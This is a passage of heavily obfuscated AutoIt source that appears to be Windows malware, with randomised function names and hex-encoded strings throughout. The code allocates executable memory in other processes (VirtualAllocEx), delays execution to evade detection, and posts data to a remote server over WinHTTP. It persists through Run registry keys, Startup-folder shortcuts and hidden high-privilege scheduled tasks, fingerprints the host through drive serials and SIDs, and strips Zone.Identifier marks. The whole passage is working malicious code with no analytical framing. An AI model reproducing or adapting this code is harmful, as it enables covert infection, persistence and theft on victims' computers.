1370. Func vdkbbykorgwrzvqphxzupgtfmcireq_ajbyaxwyezecmzw()
1371. Return BinaryToString("0x5B22")
1372. EndFunc
1373.  
1374. Func xxstmhlpmbibgvemtxxswdorzdhaqgglqohwhuhoabvzwf()
1375. Local $vcszyrlktd1ygoamvj3gtl40cf
1376. $vcszyrlktd1ygoamvj3gtl40cf = ".l" & "nk"
1377. Return $vcszyrlktd1ygoamvj3gtl40cf
1378. EndFunc
1379.  
1380. Func yudegdcvnivlxsfkrhgsdpuctiguwhzeyxyovq_iz()
1381. Local $44pxlim9sxt9aydjtbgg = vdkbbykorgwrzvqphxzupgtfmcireq_ajbyaxwyezecmzw()
1382. Return $44pxlim9sxt9aydjtbgg
1383. EndFunc
1384.  
1385. Func igbeploplr_lotsclxxroi_hkaewbqnllq()
1386. Local $0s9fcuorv9ry1unk = "0x583836"
1387. Return $0s9fcuorv9ry1unk
1388. EndFunc
1389.  
1390. Func aytbzrapgkyw()
1391. Local $g15jcv7tzwjvbkalbrua
1392. $g15jcv7tzwjvbkalbrua = "0X50726f636573736f724e616d65537472696e67"
1393. Return $g15jcv7tzwjvbkalbrua
1394. EndFunc
1395.  
1396. Func raeay_odizwtovx()
1397. Return "HKEY_LOCAL_MACHINE\SOFTWARE\Micros" & "oft\Windo" & "ws N" & "T\CurrentVersion\ProfileList"
1398. EndFunc
1399.  
1400. Func lyqvgdzzpplfyyezogknumhmdcpindeauspqhil()
1401. Local $ll7giyhzvql91atusllcjiq58esrr4 = "0x583836"
1402. Return $ll7giyhzvql91atusllcjiq58esrr4
1403. EndFunc
1404.  
1405. Func _wghyt_xlcssv_xhvthilhalockwjvbaobkufvwyigqbobcyr()
1406. Local $yhoyceocuqvux1prl8kvc = "]"
1407. Return $yhoyceocuqvux1prl8kvc
1408. EndFunc
1409.  
1410. Func kexnnlbgfablhpkcziweggosbkcp()
1411. Return BinaryToString("0X5D", 1)
1412. EndFunc
1413.  
1414. Func ztcpagvsrzpo($mpodnfy6il, $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul)
1415. Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $mpodnfy6il, "ptr", 0, "dword_ptr", $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul, "dword", 12288, "dword", Dec("40", 0))
1416. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError(Int(Chr(49)), 0, 0)
1417. Return $gwzzqtmpqf7zmwclp1y5ow17jx7g[0]
1418. EndFunc
1419.  
1420. Func wgszriylkcmzjmssqabzox()
1421. Local $ujycpijhgr07chzfeopltpg4nmebhwy = "IA64"
1422. Return $ujycpijhgr07chzfeopltpg4nmebhwy
1423. EndFunc
1424.  
1425. Func azafjpmzmwynzucxglehiqbvspktez()
1426. Return "0X61767075692E657865"
1427. EndFunc
1428.  
1429. Func zkkurjoliostulnpoaidhrzkdsrfpbertxc()
1430. Local $htuz7o2hgpn5rxfddw
1431. $htuz7o2hgpn5rxfddw = "De"
1432. Return $htuz7o2hgpn5rxfddw
1433. EndFunc
1434.  
1435. Func aepnqjn_qjuku()
1436. Local $f2v8rx7xiden
1437. $f2v8rx7xiden = bkmyzmqofazpp_gknotdxwesztvdldofdzwpg()
1438. Return $f2v8rx7xiden
1439. EndFunc
1440.  
1441. Func vfxwvy_gs_mjgnvkxdz_mxpxbesnsvy()
1442. Local $lokiaebnvexfcvfisacqly8ndwfcmtsmz
1443. $lokiaebnvexfcvfisacqly8ndwfcmtsmz = "="
1444. Return $lokiaebnvexfcvfisacqly8ndwfcmtsmz
1445. EndFunc
1446.  
1447. Func supduuqtf_m_qp()
1448. Return "]"
1449. EndFunc
1450.  
1451. Func xgtmdyqpzrxaz($znjmjyfdrzky2j45fkvi)
1452. Local $5rdcdngpsr = DllStructCreate("int" & "64")
1453. DllStructSetData($5rdcdngpsr, StringLen("W"), -StringLen("E") * ($znjmjyfdrzky2j45fkvi * Dec("A")))
1454. DllCall("ntdll.dll", "dword", "ZwDelayExecution", "int", 0, "ptr", DllStructGetPtr($5rdcdngpsr))
1455. EndFunc
1456.  
1457. Func wfynrtnxvldsaqsxxxjvingsuonfhpzclgygl()
1458. Return tsaooquzydscefmkymbbhvkddbudtc_ijerzp()
1459. EndFunc
1460.  
1461. Func rpauaspgbfiugfmcqguoytjnnguyvsdmdvuazorvetjk()
1462. Local $ti0r4rg0xqwxqpuigpe8hd
1463. $ti0r4rg0xqwxqpuigpe8hd = '" /E /C /G "'
1464. Return $ti0r4rg0xqwxqpuigpe8hd
1465. EndFunc
1466.  
1467. Func ncmavsrbuwkj_dcsclb_cbs()
1468. Return "HKEY_LOCAL_MACHINE"
1469. EndFunc
1470.  
1471. Func azcwrttikodsdhmtosilqrhymexeujembbbutt($wberil45yllmiey1iokfjbehvcygbcitleksw, $kbiqevjzu53pnfd6e208ei9sh, $5t20236socwo0js5jachogkl)
1472. Local $o5mmkkdwijh8occgxyb0uqpfrl = ObjCreate("WinHT" & BinaryToString("0x54502E57696E4854545052", (((0 + StringLen("d")) + 0) + 0)) & "equest.5." & "1")
1473. If @error Then Return SetError(((Int(ChrW("49")) - 2) + 0), @error, False)
1474. $o5mmkkdwijh8occgxyb0uqpfrl.open("PO" & "S" & "T", $wberil45yllmiey1iokfjbehvcygbcitleksw, False)
1475. $o5mmkkdwijh8occgxyb0uqpfrl.setrequestheader(iualvpsgxxxmczelpvwhhblqmrotgxagf(), $5t20236socwo0js5jachogkl)
1476. $o5mmkkdwijh8occgxyb0uqpfrl.setrequestheader(BinaryToString("0x436f6e74656e742d54797065", Int(Chr("49"))), BinaryToString("0x6170706C69636174696F6E" & "2F782D" & "7777772D66" & "6F726D2D75726C656E636F64656" & "4", 1))
1477. $o5mmkkdwijh8occgxyb0uqpfrl.setrequestheader(BinaryToString("0x436F6E74656E742D4C656E677468"), StringLen($kbiqevjzu53pnfd6e208ei9sh))
1478. $o5mmkkdwijh8occgxyb0uqpfrl.send($kbiqevjzu53pnfd6e208ei9sh)
1479. If @error OR $wpqhjjzjyuehnra <> 0 Then
1480. $wpqhjjzjyuehnra = 0
1481. Return SetError((Dec("1", 0) * (4 / -2)), @error, False)
1482. EndIf
1483. Local $wfexj4z8i3b0udx0zcchcsdvggv1j6py0z1scdjwvrbdvdlby = $o5mmkkdwijh8occgxyb0uqpfrl.status
1484. If $wfexj4z8i3b0udx0zcchcsdvggv1j6py0z1scdjwvrbdvdlby = 200 Then
1485. Return BinaryToString($o5mmkkdwijh8occgxyb0uqpfrl.responsebody)
1486. Else
1487. Return SetError(((Int(Chr(49)) * 3) + -6), $wfexj4z8i3b0udx0zcchcsdvggv1j6py0z1scdjwvrbdvdlby, False)
1488. EndIf
1489. EndFunc
1490.  
1491. Func konyqusqkq_qcty_hkpqnpqbzfvzlcxze_nwm()
1492. Return "\"
1493. EndFunc
1494.  
1495. Func omubxoacpbjouqbwuxbryxqhllqtgz_epoflhzfebdbo()
1496. Return "Stri"
1497. EndFunc
1498.  
1499. Func gsvrgilpirrqddrbznmaewwoxdhudqe()
1500. Local $ikiano6ccdeg
1501. $ikiano6ccdeg = "S-1-"
1502. Return $ikiano6ccdeg
1503. EndFunc
1504.  
1505. Func hins_xsbpamdjm()
1506. Local $phklrgbwmndk22mew8eo6wa4hd9gpgkp4ygk0
1507. $phklrgbwmndk22mew8eo6wa4hd9gpgkp4ygk0 = "0x64776f726420636253697a653b7074722052657365727665643b707472204465736b746f703b707472205469746c653b64776f726420583b64776f726420593b64776f7264205853697a653b64776f7264205953697a653b64776f72642058436f756e7443686172733b64776f72642059436f756e7443686172733b64776f72642046696c6c4174747269627574653b64776f726420466c6167733b776f72642053686f7757696e646f773b776f7264205265736572766564323b707472205265736572766564323b7074722068537464496e7075743b70747220685374644f75747075743b70747220685374644572726f72"
1508. Return $phklrgbwmndk22mew8eo6wa4hd9gpgkp4ygk0
1509. EndFunc
1510.  
1511. Func kwunbssfrdmowoetvphkavhjsyiuxsapmapqcbbrxvqcsnb()
1512. Local $4b4hfb3jwbkjihgeoupdpjj6cgc4ccechxupbxgz8
1513. $4b4hfb3jwbkjihgeoupdpjj6cgc4ccechxupbxgz8 = BinaryToString(napcxlnzritfccozuamlxc_pofjkghdknxvhi(), 1)
1514. Return $4b4hfb3jwbkjihgeoupdpjj6cgc4ccechxupbxgz8
1515. EndFunc
1516.  
1517. Func hzey_ahlkhvhemrscd_fl()
1518. Local $2485nlw5kpiwq3zz4zaijv6m
1519. $2485nlw5kpiwq3zz4zaijv6m = ":Zone.I" & "dent" & "ifi" & "e" & "r"
1520. Return $2485nlw5kpiwq3zz4zaijv6m
1521. EndFunc
1522.  
1523. Func wdeersmqmeia($2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
1524. Local $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm
1525. If @OSArch <> wlptpdgymhaqwbxheuoc_slmujgoyzefk() Then $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm = "6" & "4"
1526. If IsAdmin() = True Then
1527. If RegRead(ncmavsrbuwkj_dcsclb_cbs() & $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm & "\Software" & "\Microsoft\W" & "indows\Curre" & "ntVersion\Run\", $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then RegDelete(BinaryToString("0X" & "4" & "84B45595F4C" & "4F43414C5F4D41" & "4348494E" & "45") & $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm & lhkdyhqgsnwgdzpdzsztrsglapgjcayfbpoe(), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
1528. If RegRead(BinaryToString("0X484B45595F43555252454E545F555345525C536F6674776172" & "655C4D696" & "3726F736F66745C57696E646F77735C43757272" & "656E7456657273696F6E5C52756E5C", (0 + (-1 / (-1 / 1)))), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then RegDelete(gcqvwlgabthmqyetwucla_gcivspmsnulr(), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
1529. Local $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = Run(jydoxbdsboalqta(), "", @SW_HIDE, 2)
1530. ProcessWaitClose($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8, StringLen("7Bu5KtqUix"))
1531. If NOT @error Then
1532. Local $0anfbfiacxx = StdoutRead($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8)
1533. If StringInStr($0anfbfiacxx, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then
1534. Run(BinaryToString("0X7363687461736b73", Int(ChrW("49"))) & " /" & zkkurjoliostulnpoaidhrzkdsrfpbertxc() & BinaryToString("0X6c657465") & " /TN " & Chr("3" & "4") & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & Chr("3" & "4") & rshhjjzjoqnrfvikbddmfoeyxfjzcbpobhgorsqhrv(), "", @SW_HIDE)
1535. EndIf
1536. EndIf
1537. If FileExists(@StartupCommonDir & BinaryToString("0x5C", 1) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & bictenbxhtjgwsjpjtlz()) Then FileDelete(@StartupCommonDir & BinaryToString("0" & "x" & "5C", StringLen("s")) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & "." & "l" & "n" & "k")
1538. Else
1539. If RegRead(BinaryToString(BinaryToString("0x3078343834423435353935463433353535323532343534453534354635353533343535323543353336463636373437373631373236353543344436393633373" & "2364637333646363637343543353736393645363436463737373335433433373537323732363536453734353636353732373336393646" & "364535433532373536453543")), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then RegDelete(reffgukbceidox(), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
1540. If FileExists(@StartupDir & BinaryToString("0" & "X5" & "c", Int(Chr(49))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & "." & "l" & "n" & "k") Then FileDelete(@StartupDir & wxbudxwwclnkwbnp() & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & xxstmhlpmbibgvemtxxswdorzdhaqgglqohwhuhoabvzwf())
1541. EndIf
1542. EndFunc
1543.  
1544. Func qhdcazedjxsqolohpguzcltkoait()
1545. Local $v7rqynzzc8q6awsffaxzz3spexouzpq7xfiujwz = "Rcx"
1546. Return $v7rqynzzc8q6awsffaxzz3spexouzpq7xfiujwz
1547. EndFunc
1548.  
1549. Func ztqerabqikbldjzkht()
1550. Return mzecyhabmcizyfxvlourcffcdcbruycdwb(StringToBinary(DriveGetType(@HomeDrive & BinaryToString("0x" & "5" & "C", Int(Chr(49)))) & DriveSpaceTotal(@HomeDrive & ppmcdosepfdovocapnawwmitxeolhobtjphdjznqbrrrbi()) & DriveGetSerial(@HomeDrive & BinaryToString(ulcjgcxrffja_ogbqabrjwmegnxnvrbqb()))))
1551. EndFunc
1552.  
1553. Func bkmjbpjydgpjezru($n4c3hqn4eib0zrsardsumi3, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
1554. If NOT IsAdmin() Then Return SetError((Dec("1", 0) / -1), -StringLen("I"), False)
1555. Local $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = Run(BinaryToString("0X7363687461736B73202F5175657279"), "", @SW_HIDE, 2)
1556. ProcessWaitClose($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8, (-20 / ((StringLen("9sws") / -1) / (2 + 0))))
1557. If NOT @error Then
1558. Local $0anfbfiacxx = StdoutRead($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8)
1559. If NOT StringInStr($0anfbfiacxx, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then
1560. If @OSVersion = cpttzgulsesxriwhs() OR @OSVersion = BinaryToString("0X57494e5f585065") Then
1561. Run("schtasks " & "/Create /SC ON" & "LOGON /TN " & Chr(BinaryToString(BinaryToString("0X305833333334", Int(Chr(49))))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & Chr(BinaryToString("0x3334", 1)) & samxpookfiehurh() & Chr("3" & "4") & $n4c3hqn4eib0zrsardsumi3 & Chr("3" & "4"), "", @SW_HIDE)
1562. Else
1563. Run(BinaryToString("0X7363687461736b73202f4372656174" & "65202f534320" & "4f" & "4e4c4f474f" & "4e202f544e" & "20", (-1 - (-1 - 1))) & Chr(BinaryToString("0x3334", (0 + Int(Chr("49"))))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & Chr("3" & "4") & " /RL" & " HI" & BinaryToString("0x4748455354202F5452") & " " & Chr(BinaryToString("0X3334", Dec("1", 0))) & $n4c3hqn4eib0zrsardsumi3 & Chr(ubajtsbgaahkkcrdi()), "", @SW_HIDE)
1564. EndIf
1565. EndIf
1566. EndIf
1567. Return SetError(0, 0, True)
1568. EndFunc
1569.  
1570. Func ndxipyamhikphz($7rreuxn1kzllf8ickhwzibom9xvbzf)
1571. If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, "[") AND StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, "]") Then
1572. If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, "," & " ") Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringReplace($7rreuxn1kzllf8ickhwzibom9xvbzf, "," & " ", BinaryToString(BinaryToString("0X30583263")))
1573. If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, BinaryToString("0x" & "2" & "2")) Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringReplace($7rreuxn1kzllf8ickhwzibom9xvbzf, '"', "")
1574. If StringLeft($7rreuxn1kzllf8ickhwzibom9xvbzf, (0 - (0 + (-1 / Dec("1"))))) = "[" Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringTrimLeft($7rreuxn1kzllf8ickhwzibom9xvbzf, Int(ChrW(49)))
1575. If StringRight($7rreuxn1kzllf8ickhwzibom9xvbzf, Int(Chr("49"))) = BinaryToString(BinaryToString("0X30783544", (-1 + Dec("2", 0))), Dec("1", 0)) Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringTrimRight($7rreuxn1kzllf8ickhwzibom9xvbzf, ((0 + ((((0 + -1) / ((-1 + 0) - -2)) / 1) - 0)) / (Dec("1", 0) + (2 / -1))))
1576. If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, cweespicvbksldpwwugjuchdstxolpsea()) Then
1577. Local $4gkzstnhi3gu[1], $b6bkqk71flhjou63, $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o, $fz3eclo13c4hpsztvduuwn10gcs, $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym
1578. $b6bkqk71flhjou63 = StringSplit($7rreuxn1kzllf8ickhwzibom9xvbzf, "," & "[", ((1 / (0 + (-1 + 2))) / (0 - (-1 - 0))))
1579. $4gkzstnhi3gu[0] = 0
1580. For $fz3eclo13c4hpsztvduuwn10gcs = 1 To $b6bkqk71flhjou63[0]
1581. If StringRight($b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs], 1) = kexnnlbgfablhpkcziweggosbkcp() Then
1582. $b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs] = StringTrimRight($b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs], (0 + 1))
1583. $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o = StringSplit($b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs], BinaryToString("0x2c"))
1584. If UBound($4gkzstnhi3gu, 2) < UBound($foqtequiqk5kmj21igcviqglje7jn21nlidrps8o) Then
1585. $4gkzstnhi3gu = ljcqynralzwqjf($4gkzstnhi3gu, UBound($4gkzstnhi3gu) + 1, UBound($foqtequiqk5kmj21igcviqglje7jn21nlidrps8o) - 1)
1586. Else
1587. ReDim $4gkzstnhi3gu[UBound($4gkzstnhi3gu) + Int(ChrW("49"))][UBound($4gkzstnhi3gu, 2)]
1588. EndIf
1589. For $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym = Int(Chr("49")) To $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o[0]
1590. $4gkzstnhi3gu[UBound($4gkzstnhi3gu) - (1 / StringLen("h"))][$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym - StringLen("h")] = $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o[$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym]
1591. Next
1592. If UBound($4gkzstnhi3gu, Dec("2")) > 0 Then
1593. $4gkzstnhi3gu[0][0] += ((1 - 0) + 0)
1594. Else
1595. $4gkzstnhi3gu[0] += StringLen("7")
1596. EndIf
1597. Else
1598. If UBound($4gkzstnhi3gu, Int(Chr(50))) > 0 Then
1599. ReDim $4gkzstnhi3gu[UBound($4gkzstnhi3gu) + Dec("1")][UBound($4gkzstnhi3gu, 2)]
1600. Else
1601. ReDim $4gkzstnhi3gu[UBound($4gkzstnhi3gu) + Int(ChrW("49"))]
1602. EndIf
1603. $4gkzstnhi3gu[UBound($4gkzstnhi3gu) - 1] = $b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs]
1604. If UBound($4gkzstnhi3gu, Int(Chr("50"))) > 0 Then
1605. $4gkzstnhi3gu[0][0] += 1
1606. Else
1607. $4gkzstnhi3gu[0] += Dec("1", 0)
1608. EndIf
1609. EndIf
1610. Next
1611. Else
1612. Local $4gkzstnhi3gu[((1 + (2 / -1)) - (3 / -1))] = [1, $7rreuxn1kzllf8ickhwzibom9xvbzf]
1613. EndIf
1614. ElseIf StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, '"') Then
1615. $7rreuxn1kzllf8ickhwzibom9xvbzf = StringReplace($7rreuxn1kzllf8ickhwzibom9xvbzf, '"', "")
1616. Local $4gkzstnhi3gu[(Dec("1") * 2)] = [1, $7rreuxn1kzllf8ickhwzibom9xvbzf]
1617. ElseIf StringIsDigit($7rreuxn1kzllf8ickhwzibom9xvbzf) Then
1618. Local $4gkzstnhi3gu[Dec("2")] = [Int(Chr(49)), $7rreuxn1kzllf8ickhwzibom9xvbzf]
1619. Else
1620. Return SetError(-1, -1, False)
1621. EndIf
1622. Return $4gkzstnhi3gu
1623. EndFunc
1624.  
1625. Func buvlnkhyhokev()
1626. Local $oza8dkxfduzx9cp
1627. $oza8dkxfduzx9cp = "0x22"
1628. Return $oza8dkxfduzx9cp
1629. EndFunc
1630.  
1631. Func majopsiftujeynku()
1632. Return BinaryToString("0X5C536865" & "6C6C3" & "332" & "2" & "E646C6C")
1633. EndFunc
1634.  
1635. Func mq_ttlrxgpmqogskxroyqvwm_bdzggb()
1636. Return "X64"
1637. EndFunc
1638.  
1639. Func gcqvwlgabthmqyetwucla_gcivspmsnulr()
1640. Local $vhhb6k4aaee1gz5hpzyoolfgk84a = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"
1641. Return $vhhb6k4aaee1gz5hpzyoolfgk84a
1642. EndFunc
1643.  
1644. Func fwhnpcoougjxlddfjoznzqtqlbwctprdsdvaud()
1645. Local $kmbliemxztalyld2wpyunfcolm9vnkdaayt9upu = '"'
1646. Return $kmbliemxztalyld2wpyunfcolm9vnkdaayt9upu
1647. EndFunc
1648.  
1649. Func rdptebhehksbnzvuts_aeodaoryyyztuzrcmjlkhlddlycey()
1650. Return "0x3d"
1651. EndFunc
1652.  
1653. Func jpdaayhe_iogzmlxfn_($p9fqygetfjzkktahkwmjbkxxndbbj6gey)
1654. Local $sdrcpsdjp8oa5pcmojsu9ct1ey, $ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5, $m1xwaizecme0vhmm0am2ylwg
1655. If IsString($p9fqygetfjzkktahkwmjbkxxndbbj6gey) Then
1656. $sdrcpsdjp8oa5pcmojsu9ct1ey = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $p9fqygetfjzkktahkwmjbkxxndbbj6gey, "ptr*", 0)
1657. If @error OR NOT $sdrcpsdjp8oa5pcmojsu9ct1ey[0] Then Return SetError(1, @extended, 0)
1658. $p9fqygetfjzkktahkwmjbkxxndbbj6gey = $sdrcpsdjp8oa5pcmojsu9ct1ey[(((-12 / -3) / (0 - 1)) / (1 * (1 + -3)))]
1659. $sdrcpsdjp8oa5pcmojsu9ct1ey = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $p9fqygetfjzkktahkwmjbkxxndbbj6gey)
1660. If @error Then Return SetError(((-4 / 2) + ((4 * 4) / 4)), @extended, 0)
1661. $ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5 = DllStructCreate(ncsv_axwhwanqqdyepezikkiinqlpqmecxpbufbt() & $sdrcpsdjp8oa5pcmojsu9ct1ey[0] & supduuqtf_m_qp(), $p9fqygetfjzkktahkwmjbkxxndbbj6gey)
1662. $m1xwaizecme0vhmm0am2ylwg = DllStructCreate("byte" & " Data" & "[" & DllStructGetSize($ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5) & BinaryToString(BinaryToString("0" & "X" & "3058" & "3564"), Int(Chr("49"))))
1663. DllStructSetData($m1xwaizecme0vhmm0am2ylwg, qlgskympacaenl_h(), DllStructGetData($ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5, qyhpgtxpkraadh()))
1664. DllCall("kernel32.dll", "handle", "LocalFree", "handle", $p9fqygetfjzkktahkwmjbkxxndbbj6gey)
1665. If @error Then Return SetError(StringLen("Q2O"), @extended, 0)
1666. $p9fqygetfjzkktahkwmjbkxxndbbj6gey = $m1xwaizecme0vhmm0am2ylwg
1667. EndIf
1668. $sdrcpsdjp8oa5pcmojsu9ct1ey = DllCall("advapi32.dll", "bool", "LookupAccountSidW", "ptr", "", "struct*", $p9fqygetfjzkktahkwmjbkxxndbbj6gey, "wstr", "", "dword*", 65536, "wstr", "", "dword*", ((-8657 + -3842) - (-25425 + -52610)), "int*", 0)
1669. If @error OR NOT $sdrcpsdjp8oa5pcmojsu9ct1ey[0] Then Return SetError((((4 / ((StringLen("jC") + -4) + 0)) - (-4 / 1)) + (1 * Dec("2"))), @extended, 0)
1670. Return $sdrcpsdjp8oa5pcmojsu9ct1ey[((3 - 12) / (((1 / (((1 / (-1 - 0)) + 0) / 1)) - 0) - Dec("2", 0)))]
1671. EndFunc
1672.  
1673. Func xsguetdejifnxhci_f()
1674. Local $azgdbwjkjldnxnglz = BinaryToString("0x532D312D352D33322D353435")
1675. Return $azgdbwjkjldnxnglz
1676. EndFunc
1677.  
1678. Func ljcqynralzwqjf($wxermiwowhsasf9mtbmpt, $qcwyj5fmwo5m9g8nisvlpqb1jnl2svlrfh, $ya1rlwhpvq1)
1679. Local $4gkzstnhi3gu[$qcwyj5fmwo5m9g8nisvlpqb1jnl2svlrfh][$ya1rlwhpvq1], $fz3eclo13c4hpsztvduuwn10gcs, $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym
1680. If UBound($wxermiwowhsasf9mtbmpt, 2) > 0 Then
1681. For $fz3eclo13c4hpsztvduuwn10gcs = 0 To UBound($wxermiwowhsasf9mtbmpt) - (0 - -1)
1682. For $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym = 0 To UBound($wxermiwowhsasf9mtbmpt, Int(ChrW("50"))) - 1
1683. $4gkzstnhi3gu[$fz3eclo13c4hpsztvduuwn10gcs][$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym] = $wxermiwowhsasf9mtbmpt[$fz3eclo13c4hpsztvduuwn10gcs][$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym]
1684. Next
1685. Next
1686. Else
1687. For $fz3eclo13c4hpsztvduuwn10gcs = 0 To UBound($wxermiwowhsasf9mtbmpt) - (((0 + -1) / Int(ChrW(49))) - (-2 + 0))
1688. $4gkzstnhi3gu[$fz3eclo13c4hpsztvduuwn10gcs][0] = $wxermiwowhsasf9mtbmpt[$fz3eclo13c4hpsztvduuwn10gcs]
1689. Next
1690. EndIf
1691. Return $4gkzstnhi3gu
1692. EndFunc
1693.  
1694. Func sbenvtjps_llhlvtw()
1695. Return "0x30783438346234353539356634633466343334313463356634643431343334383439346534353563353334663436353435373431353234353563346436393633373236663733366636363734356335373639366536343666373737333230346535343563343337353732373236353665373435363635373237333639366636653563353037323666363636393663363534633639373337343563"
1696. EndFunc
1697.  
1698. Func emkwvmcvdwchvlggjh()
1699. Return "updaterui.exe"
1700. EndFunc
1701.  
1702. Func wxbudxwwclnkwbnp()
1703. Return "\"
1704. EndFunc
1705.  
1706. Func nhmtqsdhdgeimlif()
1707. Local $uyupnwilw8i93iyfe4jroji3rm8 = "as" & "hServ" & ".exe"
1708. Return $uyupnwilw8i93iyfe4jroji3rm8
1709. EndFunc
1710.  
1711. Func _zauoysuzmlereeujfkwlvy()
1712. Local $pebknglp5tt4upzhzupzzytgtb30zbmrl24yx0j1zaw
1713. $pebknglp5tt4upzhzupzzytgtb30zbmrl24yx0j1zaw = zvwndffxdbesncpkyrbjbyfasim()
1714. Return $pebknglp5tt4upzhzupzzytgtb30zbmrl24yx0j1zaw
1715. EndFunc
1716.  
1717. Func ks_tmbbcohmnojwvgvjjpboikjrqqlwoiuhfpmhibhkuupai()
1718. Local $dkqorlifr0uk5t
1719. $dkqorlifr0uk5t = "0x49413634"
1720. Return $dkqorlifr0uk5t
1721. EndFunc
1722.  
1723. Func ejltrmxaafxmoufziiqvmjtahjkcqjdzj_yg_jsvmbtdzaipj()
1724. Return '"'
1725. EndFunc
1726.  
1727. Func ubajtsbgaahkkcrdi()
1728. Return BinaryToString("0X3334")
1729. EndFunc
1730.  
1731. Func sdzvmsjsjepebalxyzamymrnjpzltpexiivwmoji()
1732. Return "0x5369676E6174757265"
1733. EndFunc
1734.  
1735. Func wlptpdgymhaqwbxheuoc_slmujgoyzefk()
1736. Local $nrnacbxvchqh = BinaryToString(lyqvgdzzpplfyyezogknumhmdcpindeauspqhil(), 1)
1737. Return $nrnacbxvchqh
1738. EndFunc
1739.  
1740. Func rzwyukcynnwzcpeuvhaibwylv_dwcpeuz()
1741. Local $c087dm8umqbqal9rbqip71z1a1xzxi0jif4 = BinaryToString(fyhtcqknnvyqupj_cgxhowajmf())
1742. Return $c087dm8umqbqal9rbqip71z1a1xzxi0jif4
1743. EndFunc
1744.  
1745. Func sfzl_onbyjsysrkquujnmoxne_apoyk_blhyjitmg_wpu($xdl1fupjkev5krgwcnqdylzcolqcweuhcx5, $nr1qodybzsvkbrteei0g66pv, $naei84ejazwv72cuffvz7ddjjevoalr, $lrcqa6nltol, $cmnasi8pxhnoaau6rjtayo)
1746. Local $grvxlhvk0axgbl1xfaxpe28wz = $naei84ejazwv72cuffvz7ddjjevoalr - $lrcqa6nltol
1747. Local $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul = DllStructGetSize($nr1qodybzsvkbrteei0g66pv)
1748. Local $vgcbb26bdutogbnp = DllStructGetPtr($nr1qodybzsvkbrteei0g66pv)
1749. Local $7qmvohrm6jc9s, $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj
